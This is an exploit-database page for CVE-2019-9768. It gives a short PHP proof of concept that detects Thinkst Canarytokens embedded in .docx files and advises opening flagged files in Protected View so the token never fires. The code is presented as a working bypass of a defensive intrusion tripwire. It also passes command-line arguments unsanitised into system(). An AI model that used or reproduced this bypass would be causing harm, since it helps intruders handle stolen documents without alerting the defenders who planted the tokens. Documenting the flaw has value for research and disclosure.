Canarytokens 20190301 detection bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-21 | Type : dos | Platform : windows
This exploit / vulnerability Canarytokens 20190301 detection bypass is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Date: 20.03.2019
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A
# CVE: 2019-9768
#==================================================================================================================================================================================
# PoC:
#
#
#
# Requires unzip:
#
# sudo apt-get install unzip
#
#


<?php

system('unzip ' . $argv[1] . '.docx');

system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');

$strFile = file_get_contents("docProps/core.xml");

if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
{
echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
}
else
{
echo "Should be safe to open normally";
}
?>

Canarytokens 20190301 detection bypass


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Canarytokens 20190301 detection bypass Vulnerability / Exploit